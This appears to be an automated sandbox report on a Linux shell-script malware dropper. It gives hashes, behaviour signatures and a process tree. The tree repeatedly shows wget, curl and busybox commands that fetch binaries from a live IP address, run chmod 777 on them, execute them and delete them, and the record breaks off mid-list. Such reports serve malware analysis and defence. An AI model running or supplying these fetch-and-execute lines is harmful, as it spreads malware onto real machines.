Analysis
-
max time kernel
39s -
max time network
67s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
21/10/2024, 01:32
Static task
static1
Behavioral task
behavioral1
Sample
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh
-
Size
10KB
-
MD5
9498e3b84daf1f4fc7db572ea81ea29a
-
SHA1
d111505e7f6138c1c8a076bcc550d27c2af9435d
-
SHA256
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27
-
SHA512
59578af0e9e9a321012ffa73db2ca0c348f5dca7652699e0b4af750e484904a86639affdd1e915279db83872d418ac858ceb4d514a3a38006959626b0bd5f66c
-
SSDEEP
192:19JmC837g7T3DywO2SFuuP5AE3m2EyAE3m2xmCjz3j3DyD2SFuuaS:196g7jfY5AE3m2EyAE3m2HPXS
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 719 chmod 770 chmod 809 chmod 920 chmod 739 chmod 902 chmod 908 chmod 843 chmod 914 chmod 932 chmod 823 chmod 861 chmod 867 chmod 879 chmod 835 chmod 849 chmod 698 chmod 763 chmod 790 chmod 817 chmod 885 chmod 692 chmod 829 chmod 855 chmod 873 chmod 896 chmod 926 chmod 938 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw 693 n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw /tmp/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj 699 xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj /tmp/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S 720 d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S /tmp/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB 740 mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB /tmp/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b 764 OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b /tmp/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk 772 vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk /tmp/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la 791 tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la /tmp/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc 810 tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc /tmp/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa 818 fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa /tmp/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc 824 Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc /tmp/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV 830 HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV /tmp/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM 836 ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM /tmp/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE 844 zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE /tmp/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj 850 L61llAWWU2CFeuII9JxkId3UgC0sjcthJj /tmp/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE 856 zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE /tmp/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj 862 L61llAWWU2CFeuII9JxkId3UgC0sjcthJj /tmp/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S 868 d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S /tmp/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB 874 mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB /tmp/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw 880 n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw /tmp/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj 886 xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj /tmp/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk 897 vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk /tmp/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la 903 tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la /tmp/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b 909 OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b /tmp/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV 915 HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV /tmp/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM 921 ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM /tmp/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc 927 tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc /tmp/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa 933 fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa /tmp/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc 939 Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc -
Checks CPU configuration 1 TTPs 28 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc curl File opened for modification /tmp/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj curl File opened for modification /tmp/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa curl File opened for modification /tmp/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV curl File opened for modification /tmp/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB curl File opened for modification /tmp/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV curl File opened for modification /tmp/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw curl File opened for modification /tmp/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM curl File opened for modification /tmp/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE curl File opened for modification /tmp/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la curl File opened for modification /tmp/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la curl File opened for modification /tmp/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc curl File opened for modification /tmp/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj curl File opened for modification /tmp/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM curl File opened for modification /tmp/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc curl File opened for modification /tmp/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj curl File opened for modification /tmp/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b curl File opened for modification /tmp/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE curl File opened for modification /tmp/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB curl File opened for modification /tmp/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S curl File opened for modification /tmp/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw curl File opened for modification /tmp/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b curl File opened for modification /tmp/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc curl File opened for modification /tmp/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa curl File opened for modification /tmp/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S curl File opened for modification /tmp/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk curl File opened for modification /tmp/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj curl File opened for modification /tmp/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk curl
Processes
-
/tmp/9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh/tmp/9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh1⤵PID:661
-
/bin/rm/bin/rm bins.sh2⤵PID:663
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵PID:665
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:680
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵PID:689
-
-
/bin/chmodchmod 777 n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵
- File and Directory Permissions Modification
PID:692
-
-
/tmp/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw./n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵
- Executes dropped EXE
PID:693
-
-
/bin/rmrm n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵PID:694
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵PID:695
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:696
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵PID:697
-
-
/bin/chmodchmod 777 xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵
- File and Directory Permissions Modification
PID:698
-
-
/tmp/xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj./xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵
- Executes dropped EXE
PID:699
-
-
/bin/rmrm xW7TG2fHlVCa3oX5LtgxcXtErLABCF3NIj2⤵PID:700
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵PID:701
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:707
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵PID:715
-
-
/bin/chmodchmod 777 d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵
- File and Directory Permissions Modification
PID:719
-
-
/tmp/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S./d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵
- Executes dropped EXE
PID:720
-
-
/bin/rmrm d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵PID:722
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵PID:723
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:728
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵PID:735
-
-
/bin/chmodchmod 777 mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵
- File and Directory Permissions Modification
PID:739
-
-
/tmp/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB./mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵
- Executes dropped EXE
PID:740
-
-
/bin/rmrm mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵PID:742
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵PID:743
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:751
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵PID:760
-
-
/bin/chmodchmod 777 OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵
- File and Directory Permissions Modification
PID:763
-
-
/tmp/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b./OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵
- Executes dropped EXE
PID:764
-
-
/bin/rmrm OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵PID:765
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵PID:766
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:767
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵PID:768
-
-
/bin/chmodchmod 777 vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵
- File and Directory Permissions Modification
PID:770
-
-
/tmp/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk./vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵
- Executes dropped EXE
PID:772
-
-
/bin/rmrm vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵PID:773
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵PID:774
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:780
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵PID:786
-
-
/bin/chmodchmod 777 tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵
- File and Directory Permissions Modification
PID:790
-
-
/tmp/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la./tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵
- Executes dropped EXE
PID:791
-
-
/bin/rmrm tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵PID:793
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵PID:794
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:799
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵PID:805
-
-
/bin/chmodchmod 777 tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc./tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵
- Executes dropped EXE
PID:810
-
-
/bin/rmrm tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵PID:811
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵PID:812
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:815
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵PID:816
-
-
/bin/chmodchmod 777 fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵
- File and Directory Permissions Modification
PID:817
-
-
/tmp/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa./fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵
- Executes dropped EXE
PID:818
-
-
/bin/rmrm fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵PID:819
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵PID:820
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:821
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵PID:822
-
-
/bin/chmodchmod 777 Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵
- File and Directory Permissions Modification
PID:823
-
-
/tmp/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc./Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵
- Executes dropped EXE
PID:824
-
-
/bin/rmrm Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵PID:825
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵PID:826
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:827
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵PID:828
-
-
/bin/chmodchmod 777 HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV./HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵
- Executes dropped EXE
PID:830
-
-
/bin/rmrm HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵PID:831
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵PID:832
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:833
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵PID:834
-
-
/bin/chmodchmod 777 ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵
- File and Directory Permissions Modification
PID:835
-
-
/tmp/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM./ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵
- Executes dropped EXE
PID:836
-
-
/bin/rmrm ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵PID:837
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵PID:838
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:839
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵PID:842
-
-
/bin/chmodchmod 777 zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵
- File and Directory Permissions Modification
PID:843
-
-
/tmp/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE./zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵
- Executes dropped EXE
PID:844
-
-
/bin/rmrm zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵PID:845
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵PID:846
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:847
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵PID:848
-
-
/bin/chmodchmod 777 L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵
- File and Directory Permissions Modification
PID:849
-
-
/tmp/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj./L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵
- Executes dropped EXE
PID:850
-
-
/bin/rmrm L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵PID:851
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵PID:852
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:853
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵PID:854
-
-
/bin/chmodchmod 777 zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵
- File and Directory Permissions Modification
PID:855
-
-
/tmp/zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE./zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵
- Executes dropped EXE
PID:856
-
-
/bin/rmrm zRhy0AlaPAwg5X3HbsH9fTeTygTujXb2DE2⤵PID:857
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵PID:858
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:859
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵PID:860
-
-
/bin/chmodchmod 777 L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵
- File and Directory Permissions Modification
PID:861
-
-
/tmp/L61llAWWU2CFeuII9JxkId3UgC0sjcthJj./L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵
- Executes dropped EXE
PID:862
-
-
/bin/rmrm L61llAWWU2CFeuII9JxkId3UgC0sjcthJj2⤵PID:863
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵PID:864
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:865
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵PID:866
-
-
/bin/chmodchmod 777 d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S./d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm d5wTuUQ4lf7aYPuIAvWbADRU2RmupvVW5S2⤵PID:869
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵PID:870
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵PID:872
-
-
/bin/chmodchmod 777 mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB./mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm mqgqmiGmJ5tJ4WuiSnPI1AGdv6u4Z2rDqB2⤵PID:875
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/n06gAhjku0mqJ4CJdiQJ43tOkTK3lc7WJw2⤵PID:876
-
